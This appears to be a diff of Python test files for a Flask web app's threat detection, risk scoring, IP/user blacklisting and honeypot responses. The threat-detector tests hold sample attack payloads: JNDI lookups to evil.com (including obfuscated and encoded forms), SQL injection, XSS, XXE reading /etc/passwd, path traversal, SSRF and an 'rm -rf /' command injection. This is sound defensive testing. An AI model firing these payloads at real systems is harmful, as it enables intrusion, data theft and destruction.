manager = BlacklistManager()
assert manager.is_ip_banned("6.6.6.6") is False # expired already
cleanup_resp = client.post("/api/admin/security/cleanup", json={})
assert cleanup_resp.status_code == 200
assert cleanup_resp.get_json()["success"] is True
# Score decayed by cleanup
assert RiskScorer().get_ip_score("5.5.5.5") == 81

View File

@@ -0,0 +1,74 @@
from __future__ import annotations
import queue
from browser_pool_worker import BrowserWorker
class _AlwaysFailEnsureWorker(BrowserWorker):
def __init__(self, *, worker_id: int, task_queue: queue.Queue):
super().__init__(worker_id=worker_id, task_queue=task_queue, pre_warm=False)
self.ensure_calls = 0
def _ensure_browser(self) -> bool: # noqa: D401 - matching base naming
self.ensure_calls += 1
if self.ensure_calls >= 2:
self.running = False
return False
def _close_browser(self):
self.browser_instance = None
def test_requeue_task_when_browser_unavailable():
task_queue: queue.Queue = queue.Queue()
callback_calls: list[tuple[object, object]] = []
def callback(result, error):
callback_calls.append((result, error))
task = {
"func": lambda *_args, **_kwargs: None,
"args": (),
"kwargs": {},
"callback": callback,
"retry_count": 0,
}
worker = _AlwaysFailEnsureWorker(worker_id=1, task_queue=task_queue)
worker.start()
task_queue.put(task)
worker.join(timeout=5)
assert worker.is_alive() is False
assert worker.ensure_calls == 2 # 本地最多尝试2次创建执行环境
assert callback_calls == [] # 第一次失败会重新入队,不应立即回调失败
requeued = task_queue.get_nowait()
assert requeued["retry_count"] == 1
def test_fail_task_after_second_assignment():
task_queue: queue.Queue = queue.Queue()
callback_calls: list[tuple[object, object]] = []
def callback(result, error):
callback_calls.append((result, error))
task = {
"func": lambda *_args, **_kwargs: None,
"args": (),
"kwargs": {},
"callback": callback,
"retry_count": 1, # 已重新分配过1次
}
worker = _AlwaysFailEnsureWorker(worker_id=1, task_queue=task_queue)
worker.start()
task_queue.put(task)
worker.join(timeout=5)
assert worker.is_alive() is False
assert callback_calls == [(None, "执行环境不可用")]
assert worker.total_tasks == 1
assert worker.failed_tasks == 1

View File

@@ -0,0 +1,63 @@
from __future__ import annotations
import uuid
from security import HoneypotResponder
def test_should_use_honeypot_threshold():
responder = HoneypotResponder()
assert responder.should_use_honeypot(79) is False
assert responder.should_use_honeypot(80) is True
assert responder.should_use_honeypot(100) is True
def test_generate_fake_response_email():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/forgot-password")
assert resp["success"] is True
assert resp["message"] == "邮件已发送"
def test_generate_fake_response_register_contains_fake_uuid():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/register")
assert resp["success"] is True
assert "user_id" in resp
uuid.UUID(resp["user_id"])
def test_generate_fake_response_login():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/login")
assert resp == {"success": True}
def test_generate_fake_response_generic():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/tasks/run")
assert resp["success"] is True
assert resp["message"] == "操作成功"
def test_delay_response_ranges():
responder = HoneypotResponder()
assert responder.delay_response(0) == 0
assert responder.delay_response(20) == 0
d = responder.delay_response(21)
assert 0.5 <= d <= 1.0
d = responder.delay_response(50)
assert 0.5 <= d <= 1.0
d = responder.delay_response(51)
assert 1.0 <= d <= 3.0
d = responder.delay_response(80)
assert 1.0 <= d <= 3.0
d = responder.delay_response(81)
assert 3.0 <= d <= 8.0
d = responder.delay_response(100)
assert 3.0 <= d <= 8.0

View File

@@ -0,0 +1,72 @@
from __future__ import annotations
import random
import security.response_handler as rh
from security import ResponseAction, ResponseHandler, ResponseStrategy
def test_get_strategy_banned_blocks():
handler = ResponseHandler(rng=random.Random(0))
strategy = handler.get_strategy(10, is_banned=True)
assert strategy.action == ResponseAction.BLOCK
assert strategy.delay_seconds == 0
assert strategy.message == "访问被拒绝"
def test_get_strategy_allow_levels():
handler = ResponseHandler(rng=random.Random(0))
s = handler.get_strategy(0)
assert s.action == ResponseAction.ALLOW
assert s.delay_seconds == 0
assert s.captcha_level == 1
s = handler.get_strategy(21)
assert s.action == ResponseAction.ALLOW
assert s.delay_seconds == 0
assert s.captcha_level == 2
def test_get_strategy_delay_ranges():
handler = ResponseHandler(rng=random.Random(0))
s = handler.get_strategy(41)
assert s.action == ResponseAction.DELAY
assert 1.0 <= s.delay_seconds <= 2.0
s = handler.get_strategy(61)
assert s.action == ResponseAction.DELAY
assert 2.0 <= s.delay_seconds <= 5.0
s = handler.get_strategy(81)
assert s.action == ResponseAction.HONEYPOT
assert 3.0 <= s.delay_seconds <= 8.0
def test_apply_delay_uses_time_sleep(monkeypatch):
handler = ResponseHandler(rng=random.Random(0))
strategy = ResponseStrategy(action=ResponseAction.DELAY, delay_seconds=1.234)
called = {"count": 0, "seconds": None}
def fake_sleep(seconds):
called["count"] += 1
called["seconds"] = seconds
monkeypatch.setattr(rh.time, "sleep", fake_sleep)
handler.apply_delay(strategy)
assert called["count"] == 1
assert called["seconds"] == 1.234
def test_get_captcha_requirement():
handler = ResponseHandler(rng=random.Random(0))
req = handler.get_captcha_requirement(ResponseStrategy(action=ResponseAction.ALLOW, captcha_level=2))
assert req == {"required": True, "level": 2}
req = handler.get_captcha_requirement(ResponseStrategy(action=ResponseAction.BLOCK, captcha_level=2))
assert req == {"required": False, "level": 2}

179
tests/test_risk_scorer.py Normal file
View File

@@ -0,0 +1,179 @@
from __future__ import annotations
from datetime import timedelta
import pytest
import db_pool
from db.schema import ensure_schema
from db.utils import get_cst_now
from security import constants as C
from security.blacklist import BlacklistManager
from security.risk_scorer import RiskScorer
@pytest.fixture()
def _test_db(tmp_path):
db_file = tmp_path / "risk_scorer_test.db"
old_pool = getattr(db_pool, "_pool", None)
try:
if old_pool is not None:
try:
old_pool.close_all()
except Exception:
pass
db_pool._pool = None
db_pool.init_pool(str(db_file), pool_size=1)
with db_pool.get_db() as conn:
ensure_schema(conn)
yield db_file
finally:
try:
if getattr(db_pool, "_pool", None) is not None:
db_pool._pool.close_all()
except Exception:
pass
db_pool._pool = old_pool
def test_record_threat_updates_scores_and_combined(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "1.2.3.4"
user_id = 123
assert scorer.get_ip_score(ip) == 0
assert scorer.get_user_score(user_id) == 0
assert scorer.get_combined_score(ip, user_id) == 0
scorer.record_threat(ip, user_id, threat_type="sql_injection", score=30, request_path="/login", payload="x")
assert scorer.get_ip_score(ip) == 30
assert scorer.get_user_score(user_id) == 30
assert scorer.get_combined_score(ip, user_id) == 30
scorer.record_threat(ip, user_id, threat_type="sql_injection", score=80, request_path="/login", payload="y")
assert scorer.get_ip_score(ip) == 100
assert scorer.get_user_score(user_id) == 100
assert scorer.get_combined_score(ip, user_id) == 100
def test_auto_ban_on_score_100(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "5.6.7.8"
user_id = 456
scorer.record_threat(ip, user_id, threat_type="sql_injection", score=100, request_path="/api", payload="boom")
assert manager.is_ip_banned(ip) is True
assert manager.is_user_banned(user_id) is True
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is not None
cursor.execute("SELECT expires_at FROM user_blacklist WHERE user_id = ?", (user_id,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is not None
def test_jndi_injection_permanent_ban(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "9.9.9.9"
user_id = 999
scorer.record_threat(ip, user_id, threat_type=C.THREAT_TYPE_JNDI_INJECTION, score=100, request_path="/", payload="${jndi:ldap://x}")
assert manager.is_ip_banned(ip) is True
assert manager.is_user_banned(user_id) is True
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None
cursor.execute("SELECT expires_at FROM user_blacklist WHERE user_id = ?", (user_id,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None
def test_high_risk_three_times_permanent_ban(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager, high_risk_threshold=80, high_risk_permanent_ban_count=3)
ip = "10.0.0.1"
user_id = 1
scorer.record_threat(ip, user_id, threat_type="nested_expression", score=80, request_path="/", payload="a")
scorer.record_threat(ip, user_id, threat_type="nested_expression", score=80, request_path="/", payload="b")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is not None # score hits 100 => temporary ban first
scorer.record_threat(ip, user_id, threat_type="nested_expression", score=80, request_path="/", payload="c")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None # 3 high-risk threats => permanent
cursor.execute("SELECT expires_at FROM user_blacklist WHERE user_id = ?", (user_id,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None
def test_decay_scores_hourly_10_percent(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "3.3.3.3"
user_id = 11
old_ts = (get_cst_now() - timedelta(hours=2)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at)
VALUES (?, 100, ?, ?, ?)
""",
(ip, old_ts, old_ts, old_ts),
)
cursor.execute(
"""
INSERT INTO user_risk_scores (user_id, risk_score, last_seen, created_at, updated_at)
VALUES (?, 100, ?, ?, ?)
""",
(user_id, old_ts, old_ts, old_ts),
)
conn.commit()
scorer.decay_scores()
assert scorer.get_ip_score(ip) == 81
assert scorer.get_user_score(user_id) == 81

View File

@@ -0,0 +1,155 @@
from __future__ import annotations
import pytest
from flask import Flask, g, jsonify
from flask_login import LoginManager
import db_pool
from db.schema import ensure_schema
from security import init_security_middleware
@pytest.fixture()
def _test_db(tmp_path):
db_file = tmp_path / "security_middleware_test.db"
old_pool = getattr(db_pool, "_pool", None)
try:
if old_pool is not None:
try:
old_pool.close_all()
except Exception:
pass
db_pool._pool = None
db_pool.init_pool(str(db_file), pool_size=1)
with db_pool.get_db() as conn:
ensure_schema(conn)
yield db_file
finally:
try:
if getattr(db_pool, "_pool", None) is not None:
db_pool._pool.close_all()
except Exception:
pass
db_pool._pool = old_pool
def _make_app(monkeypatch, _test_db, *, security_enabled: bool = True, honeypot_enabled: bool = True) -> Flask:
import security.middleware as sm
import security.response_handler as rh
# 避免测试因风控延迟而变慢
monkeypatch.setattr(rh.time, "sleep", lambda _seconds: None)
# 每个测试用例保持 handler/honeypot 的懒加载状态
sm.handler = None
sm.honeypot = None
app = Flask(__name__)
app.config.update(
SECRET_KEY="test-secret",
TESTING=True,
SECURITY_ENABLED=bool(security_enabled),
HONEYPOT_ENABLED=bool(honeypot_enabled),
SECURITY_LOG_LEVEL="CRITICAL", # 降低测试日志噪音
)
login_manager = LoginManager()
login_manager.init_app(app)
@login_manager.user_loader
def _load_user(_user_id: str):
return None
init_security_middleware(app)
return app
def _client_get(app: Flask, path: str, *, ip: str = "1.2.3.4"):
return app.test_client().get(path, environ_overrides={"REMOTE_ADDR": ip})
def test_middleware_blocks_banned_ip(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/api/ping")
def _ping():
return jsonify({"ok": True})
import security.middleware as sm
sm.blacklist.ban_ip("1.2.3.4", reason="test", duration_hours=1, permanent=False)
resp = _client_get(app, "/api/ping", ip="1.2.3.4")
assert resp.status_code == 503
assert resp.get_json() == {"error": "服务暂时繁忙,请稍后重试"}
def test_middleware_skips_static_requests(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/static/test")
def _static_test():
return "ok"
import security.middleware as sm
sm.blacklist.ban_ip("1.2.3.4", reason="test", duration_hours=1, permanent=False)
resp = _client_get(app, "/static/test", ip="1.2.3.4")
assert resp.status_code == 200
assert resp.get_data(as_text=True) == "ok"
def test_middleware_honeypot_short_circuits_side_effects(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db, honeypot_enabled=True)
called = {"count": 0}
@app.get("/api/side-effect")
def _side_effect():
called["count"] += 1
return jsonify({"real": True})
resp = _client_get(app, "/api/side-effect?q=${${a}}", ip="9.9.9.9")
assert resp.status_code == 200
payload = resp.get_json()
assert isinstance(payload, dict)
assert payload.get("success") is True
assert called["count"] == 0
def test_middleware_fails_open_on_internal_errors(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/api/ok")
def _ok():
return jsonify({"ok": True, "risk_score": getattr(g, "risk_score", None)})
import security.middleware as sm
def boom(*_args, **_kwargs):
raise RuntimeError("boom")
monkeypatch.setattr(sm.blacklist, "is_ip_banned", boom)
monkeypatch.setattr(sm.detector, "scan_input", boom)
resp = _client_get(app, "/api/ok", ip="2.2.2.2")
assert resp.status_code == 200
assert resp.get_json()["ok"] is True
def test_middleware_sets_request_context_fields(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/api/context")
def _context():
strategy = getattr(g, "response_strategy", None)
action = getattr(getattr(strategy, "action", None), "value", None)
return jsonify({"risk_score": getattr(g, "risk_score", None), "action": action})
resp = _client_get(app, "/api/context", ip="8.8.8.8")
assert resp.status_code == 200
assert resp.get_json() == {"risk_score": 0, "action": "allow"}

View File

@@ -0,0 +1,96 @@
from flask import Flask, request
from security import constants as C
from security.threat_detector import ThreatDetector
def test_jndi_direct_scores_100():
detector = ThreatDetector()
results = detector.scan_input("${jndi:ldap://evil.com/a}", "q")
assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
def test_jndi_encoded_scores_100():
detector = ThreatDetector()
results = detector.scan_input("%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fa%7D", "q")
assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
def test_jndi_obfuscated_scores_100():
detector = ThreatDetector()
payload = "${${::-j}${::-n}${::-d}${::-i}:rmi://evil.com/a}"
results = detector.scan_input(payload, "q")
assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
def test_nested_expression_scores_80():
detector = ThreatDetector()
results = detector.scan_input("${${env:USER}}", "q")
assert any(r.threat_type == C.THREAT_TYPE_NESTED_EXPRESSION and r.score == 80 for r in results)
def test_sqli_union_select_scores_90():
detector = ThreatDetector()
results = detector.scan_input("UNION SELECT password FROM users", "q")
assert any(r.threat_type == C.THREAT_TYPE_SQL_INJECTION and r.score == 90 for r in results)
def test_sqli_or_1_eq_1_scores_90():
detector = ThreatDetector()
results = detector.scan_input("a' OR 1=1 --", "q")
assert any(r.threat_type == C.THREAT_TYPE_SQL_INJECTION and r.score == 90 for r in results)
def test_xss_scores_70():
detector = ThreatDetector()
results = detector.scan_input("<script>alert(1)</script>", "q")
assert any(r.threat_type == C.THREAT_TYPE_XSS and r.score == 70 for r in results)
def test_path_traversal_scores_60():
detector = ThreatDetector()
results = detector.scan_input("../../etc/passwd", "path")
assert any(r.threat_type == C.THREAT_TYPE_PATH_TRAVERSAL and r.score == 60 for r in results)
def test_command_injection_scores_85():
detector = ThreatDetector()
results = detector.scan_input("test; rm -rf /", "cmd")
assert any(r.threat_type == C.THREAT_TYPE_COMMAND_INJECTION and r.score == 85 for r in results)
def test_ssrf_scores_75():
detector = ThreatDetector()
results = detector.scan_input("http://127.0.0.1/admin", "url")
assert any(r.threat_type == C.THREAT_TYPE_SSRF and r.score == 75 for r in results)
def test_xxe_scores_85():
detector = ThreatDetector()
payload = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>"""
results = detector.scan_input(payload, "xml")
assert any(r.threat_type == C.THREAT_TYPE_XXE and r.score == 85 for r in results)
def test_template_injection_scores_70():
detector = ThreatDetector()
results = detector.scan_input("Hello {{ 7*7 }}", "tpl")
assert any(r.threat_type == C.THREAT_TYPE_TEMPLATE_INJECTION and r.score == 70 for r in results)
def test_sensitive_path_probe_scores_40():
detector = ThreatDetector()
results = detector.scan_input("/.git/config", "path")
assert any(r.threat_type == C.THREAT_TYPE_SENSITIVE_PATH_PROBE and r.score == 40 for r in results)
def test_scan_request_picks_up_args():
app = Flask(__name__)
detector = ThreatDetector()
with app.test_request_context("/?q=${jndi:ldap://evil.com/a}"):
results = detector.scan_request(request)
assert any(r.field_name == "args.q" and r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)